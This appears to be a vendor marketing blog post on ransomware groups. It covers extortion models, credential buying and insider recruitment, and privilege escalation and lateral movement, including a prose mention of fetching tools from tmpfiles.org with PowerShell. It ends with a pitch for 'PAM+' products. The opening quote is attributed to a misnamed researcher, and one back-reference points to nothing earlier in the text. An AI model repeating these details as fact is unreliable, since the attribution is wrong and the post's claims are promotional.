4 Facts About Ransomware Groups that Use Lateral Movement
by Lori Ann Kruse, on Dec 14, 2022
“It is a fairly open secret that almost all systems can be hacked, somehow,” said the famous Internet Security Researcher David Kaminsky. “It is a less spoken of secret that such hacking has gone quite mainstream.” That statement certainly rings true in the current cyber threat landscape.
Global cyber attacks increased by 28% in the third quarter of 2022, compared to the same timeframe in 2021, according to a Checkpoint research report. The most recently available statistics around ransomware attacks cite an average ransom amount of $751,000 in 2021, a 52% increase over the previous year.
Ransomware groups consist of a collection of individuals who share one goal: to squeeze money out of their victims. The wider and stronger the cyber attacker’s hold is on the targeted organization, the greater hope is for the bad guy to get their demanded amount. To help you stay ahead of these groups of nefarious actors, we’ve compiled a list of facts that can help inform your security strategies.
Fact #1: There’s more than one way to extort money from victims
Most news stories about ransomware attacks are around a victim company’s files being locked up in the cyber attacker’s encryption. The organization is then told to pay in order to receive the decryption key. However, losing access to files is not the only extortion method.
There are multiple ways that ransomware groups use to get money from their targets. In addition to encrypting files, groups can demand payment for the decryption key and to keep the organizational data from being sold. This is called the double-extortion attack model. If the attacker is not paid, then they can release the victim’s data into the dark web for free or paid distribution.
Building on the double-extortion model is the quadruple ransom technique. As the name suggests, this technique exploits victims in four ways:
- Encryption of company files
- Threats of releasing sensitive information, usually to users on the dark web
- Leverage denial of service (DoS) attacks on the victim’s website
- Contact the company’s customers, business partners, employees, and media to announce the hack
The multi-pronged ransom technique not only causes business outages for your employees and customers but also makes data such as login credentials and other personal identifying information (PII) available to anyone on the dark web. Moreover, attackers take special care to damage the reputation of your organization among stakeholders.
Fact #2: Attackers don’t break in, they log in
As mentioned above, attackers can log into systems by simply buying compromised credentials. Some of the more involved methods that ransomware groups use to log into a system exploit social engineering. Email and voice phishing are two well-known social engineering techniques.
Other ways to get usernames and passwords include enticing an employee of a big-name company to sell their credentials to the attacker. As part of this exchange, the employee agrees to grant access through their MFA method, serving as the ‘inside guy’ to allow the attacker into the victim’s system. It’s important to note that given these methods groups use to compromise credentials, password rotation, MFA, and credential vaulting would not keep an organization safe from this kind of an attack.
Fact #3: Privilege escalation and lateral movement go hand-in-hand
Privilege escalation and lateral movement are techniques often leveraged to encrypt massive amounts of the victim’s data. To facilitate this, malware is sometimes dropped during the reconnaissance phase to harvest credentials from the system to elevate their privileges and move laterally throughout the environment. Other times, privilege escalation and lateral movement tools were downloaded. For example, once an attacker is in, they trigger a download from tmpfiles.org by using PowerShell’s Invoke-WebRequest cmdlet.
Fact #4: Ransomware groups evolve
Ransomware groups emerge every year. Case in point, the BlackBasta group emerged in spring 2022, LapsUS$ was first identified in December 2021, DarkSide was initially observed in August 2020, and the Cuba ransomware group was first seen in December 2019.
In the lifespan of these groups, ransomware groups adjust their TTPs as systems are patched and as defensive technologies advance. In other words, as soon as you think you have a nefarious actor figured out, they find another way to ravage your system.
It’s pretty much a given that ransomware groups find ways to increase the efficacy of their attacks as independent entities. However, there’s now evidence that groups collaborate and cooperate when selecting their targets. Sophos calls this phenomenon ‘coopetition.’ When this happens, the ransomware victim experiences multiple attacks from different groups in waves, or a single attack perpetrated by two or more ransomware groups working together.
The moral of this story is that cyber attackers who use ransomware are methodical, organized, and will target as many vulnerable organizations as possible. Moreover, preventing a ransomware attack isn’t always about who has the most expensive cybersecurity tooling, or who has the highest SecOps headcount. Attackers can still get into an environment through the human element, regardless of how much training you mandate.
That said, a layered defense consisting of: cybersecurity training and a strong culture around security; defensive strategies such as Zero Trust, threat-informed defense; and innovative technologies can significantly minimize the chance and blast radius of a successful attack.
Let’s end with one last point. Given the speed that ransomware groups change up their techniques, legacy technologies by themselves no longer stand up to the current attacks’ level of sophistication (when I say legacy technologies, I’m looking at you, legacy PAM). Solely relying on vault-based credential management tools, password rotation, and MFA does not stop attacks from ransomware groups.
What modern organizations need to block these kind of attacks is a PAM+ approach—it’s a way to protect access rather than just protecting usernames and passwords. PAM+ is not a specific tool, solution, or service, but a new approach to protecting access with Just-in-Time access that achieves Zero Standing Privilege. Want to learn more about how PAM+ capabilities can block ransomware attackers? Access the Remediant PAM+ ™ datasheet here.